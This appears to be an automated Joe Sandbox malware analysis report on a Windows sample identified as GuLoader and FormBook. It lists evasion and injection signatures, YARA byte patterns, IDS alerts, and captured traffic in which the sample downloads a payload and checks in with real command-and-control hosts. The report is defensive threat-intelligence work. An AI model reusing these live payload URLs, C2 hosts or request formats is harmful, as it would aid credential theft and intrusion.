Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ImBm40hNZ2.exe

Overview

General Information

Sample name:ImBm40hNZ2.exe
Analysis ID:1529843
MD5:d4c7aab6ed29a31a27712f4536614667
SHA1:ad0bd0a27fa90bbcd0d7fa853fef23f2692bea45
SHA256:bcc652b9e147d7e052c9a239e7e2330c9b3fd04743cb40804ea2616aa4f50f1a
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • ImBm40hNZ2.exe (PID: 6168 cmdline: "C:\Users\user\Desktop\ImBm40hNZ2.exe" MD5: D4C7AAB6ED29A31A27712F4536614667)
    • ImBm40hNZ2.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\ImBm40hNZ2.exe" MD5: D4C7AAB6ED29A31A27712F4536614667)
      • aypAdCUEzlG.exe (PID: 1340 cmdline: "C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 2456 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • aypAdCUEzlG.exe (PID: 900 cmdline: "C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 8 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-09T13:34:55.858437+020028032702Potentially Bad Traffic192.168.11.2049738170.249.236.53443TCP
        2024-10-09T13:35:06.975942+020028032702Potentially Bad Traffic192.168.11.2049739199.103.62.205443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-09T13:34:07.806724+020028554641A Network Trojan was detected192.168.11.204978813.248.169.4880TCP
        2024-10-09T13:35:59.115288+020028554641A Network Trojan was detected192.168.11.2049741103.247.8.5380TCP
        2024-10-09T13:36:02.023125+020028554641A Network Trojan was detected192.168.11.2049742103.247.8.5380TCP
        2024-10-09T13:36:05.090621+020028554641A Network Trojan was detected192.168.11.2049743103.247.8.5380TCP
        2024-10-09T13:36:21.517140+020028554641A Network Trojan was detected192.168.11.204974572.14.178.17480TCP
        2024-10-09T13:36:24.189485+020028554641A Network Trojan was detected192.168.11.204974672.14.178.17480TCP
        2024-10-09T13:36:26.855030+020028554641A Network Trojan was detected192.168.11.204974772.14.178.17480TCP
        2024-10-09T13:38:07.737257+020028554641A Network Trojan was detected192.168.11.2049750172.67.191.24180TCP
        2024-10-09T13:38:10.357901+020028554641A Network Trojan was detected192.168.11.2049751172.67.191.24180TCP
        2024-10-09T13:38:12.983529+020028554641A Network Trojan was detected192.168.11.2049752172.67.191.24180TCP
        2024-10-09T13:38:21.260233+020028554641A Network Trojan was detected192.168.11.2049754104.21.50.20280TCP
        2024-10-09T13:38:23.711248+020028554641A Network Trojan was detected192.168.11.2049755104.21.50.20280TCP
        2024-10-09T13:38:26.963312+020028554641A Network Trojan was detected192.168.11.2049756104.21.50.20280TCP
        2024-10-09T13:38:34.967350+020028554641A Network Trojan was detected192.168.11.2049758203.161.46.20580TCP
        2024-10-09T13:38:37.670013+020028554641A Network Trojan was detected192.168.11.2049759203.161.46.20580TCP
        2024-10-09T13:38:40.372427+020028554641A Network Trojan was detected192.168.11.2049760203.161.46.20580TCP
        2024-10-09T13:38:49.532896+020028554641A Network Trojan was detected192.168.11.204976223.227.38.7480TCP
        2024-10-09T13:38:52.415426+020028554641A Network Trojan was detected192.168.11.204976323.227.38.7480TCP
        2024-10-09T13:38:54.690081+020028554641A Network Trojan was detected192.168.11.204976423.227.38.7480TCP
        2024-10-09T13:39:02.904333+020028554641A Network Trojan was detected192.168.11.2049766154.23.184.20780TCP
        2024-10-09T13:39:05.737553+020028554641A Network Trojan was detected192.168.11.2049767154.23.184.20780TCP
        2024-10-09T13:39:08.563169+020028554641A Network Trojan was detected192.168.11.2049768154.23.184.20780TCP
        2024-10-09T13:39:17.017103+020028554641A Network Trojan was detected192.168.11.2049770185.230.15.380TCP
        2024-10-09T13:39:19.772466+020028554641A Network Trojan was detected192.168.11.2049771185.230.15.380TCP
        2024-10-09T13:39:22.539257+020028554641A Network Trojan was detected192.168.11.2049772185.230.15.380TCP
        2024-10-09T13:39:30.524181+020028554641A Network Trojan was detected192.168.11.2049774199.59.243.22780TCP
        2024-10-09T13:39:33.147058+020028554641A Network Trojan was detected192.168.11.2049775199.59.243.22780TCP
        2024-10-09T13:39:35.772200+020028554641A Network Trojan was detected192.168.11.2049776199.59.243.22780TCP
        2024-10-09T13:39:45.672323+020028554641A Network Trojan was detected192.168.11.204977885.159.66.9380TCP
        2024-10-09T13:39:48.421733+020028554641A Network Trojan was detected192.168.11.204977985.159.66.9380TCP
        2024-10-09T13:39:51.171127+020028554641A Network Trojan was detected192.168.11.204978085.159.66.9380TCP
        2024-10-09T13:39:58.385647+020028554641A Network Trojan was detected192.168.11.2049782176.57.64.10280TCP
        2024-10-09T13:40:01.048256+020028554641A Network Trojan was detected192.168.11.2049783176.57.64.10280TCP
        2024-10-09T13:40:03.694348+020028554641A Network Trojan was detected192.168.11.2049784176.57.64.10280TCP
        2024-10-09T13:40:11.681721+020028554641A Network Trojan was detected192.168.11.204978613.248.169.4880TCP
        2024-10-09T13:40:14.315496+020028554641A Network Trojan was detected192.168.11.204978713.248.169.4880TCP
        2024-10-09T13:40:25.227639+020028554641A Network Trojan was detected192.168.11.204979082.112.244.9280TCP
        2024-10-09T13:40:27.974207+020028554641A Network Trojan was detected192.168.11.204979182.112.244.9280TCP
        2024-10-09T13:40:30.707451+020028554641A Network Trojan was detected192.168.11.204979282.112.244.9280TCP
        2024-10-09T13:40:48.767888+020028554641A Network Trojan was detected192.168.11.2049795103.247.8.5380TCP
        2024-10-09T13:40:51.583421+020028554641A Network Trojan was detected192.168.11.2049796103.247.8.5380TCP
        2024-10-09T13:40:54.481457+020028554641A Network Trojan was detected192.168.11.2049797103.247.8.5380TCP
        2024-10-09T13:41:10.741849+020028554641A Network Trojan was detected192.168.11.204979972.14.178.17480TCP
        2024-10-09T13:41:13.412850+020028554641A Network Trojan was detected192.168.11.204980072.14.178.17480TCP
        2024-10-09T13:41:16.085344+020028554641A Network Trojan was detected192.168.11.204980172.14.178.17480TCP
        2024-10-09T13:42:56.328946+020028554641A Network Trojan was detected192.168.11.2049803172.67.191.24180TCP
        2024-10-09T13:42:58.958779+020028554641A Network Trojan was detected192.168.11.2049804172.67.191.24180TCP
        2024-10-09T13:43:01.599397+020028554641A Network Trojan was detected192.168.11.2049805172.67.191.24180TCP
        2024-10-09T13:43:09.934125+020028554641A Network Trojan was detected192.168.11.2049807104.21.50.20280TCP
        2024-10-09T13:43:12.194840+020028554641A Network Trojan was detected192.168.11.2049808104.21.50.20280TCP
        2024-10-09T13:43:15.028948+020028554641A Network Trojan was detected192.168.11.2049809104.21.50.20280TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: ImBm40hNZ2.exeReversingLabs: Detection: 39%
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: ImBm40hNZ2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 170.249.236.53:443 -> 192.168.11.20:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.103.62.205:443 -> 192.168.11.20:49739 version: TLS 1.2
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aypAdCUEzlG.exe, 00000004.00000000.17122430937.000000000032E000.00000002.00000001.01000000.00000008.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21523593349.000000000032E000.00000002.00000001.01000000.00000008.sdmp
        Source: Binary string: cmdkey.pdbGCTL source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: ImBm40hNZ2.exe, ImBm40hNZ2.exe, 00000003.00000003.17108712152.000000003357E000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000003.17112324273.000000003372A000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17211499240.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000005.00000003.17208213325.0000000003521000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmdkey.pdb source: ImBm40hNZ2.exe, 00000003.00000003.17165888729.0000000003225000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213184378.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000003.20397219857.000000000160B000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405E95 FindFirstFileA,FindClose,0_2_00405E95
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00402645 FindFirstFileA,3_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00405E95 FindFirstFileA,FindClose,3_2_00405E95
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301C710 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C710
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then xor eax, eax5_2_03009B50
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then mov ebx, 00000004h5_2_036804E8

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49747 -> 72.14.178.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 104.21.50.202:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 72.14.178.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 203.161.46.205:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 72.14.178.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 104.21.50.202:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 154.23.184.207:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 82.112.244.92:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 82.112.244.92:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 104.21.50.202:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 23.227.38.74:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 104.21.50.202:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 72.14.178.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 199.59.243.227:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 23.227.38.74:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 23.227.38.74:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 185.230.15.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 104.21.50.202:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 199.59.243.227:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 72.14.178.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 199.59.243.227:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 176.57.64.102:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 72.14.178.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 82.112.244.92:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 103.247.8.53:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 172.67.191.241:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 104.21.50.202:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 13.248.169.48:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.518729.xyz
        Source: Joe Sandbox ViewIP Address: 185.230.15.3 185.230.15.3
        Source: Joe Sandbox ViewIP Address: 176.57.64.102 176.57.64.102
        Source: Joe Sandbox ViewIP Address: 199.103.62.205 199.103.62.205
        Source: Joe Sandbox ViewASN Name: VIALIS-MOSELLELocatedinMetzFranceFR VIALIS-MOSELLELocatedinMetzFranceFR
        Source: Joe Sandbox ViewASN Name: TELINEABA TELINEABA
        Source: Joe Sandbox ViewASN Name: TAKE2US TAKE2US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49739 -> 199.103.62.205:443
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49738 -> 170.249.236.53:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /sCvgayhFHxN196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: secretspark.com.bdCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sCvgayhFHxN196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.groupriam.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
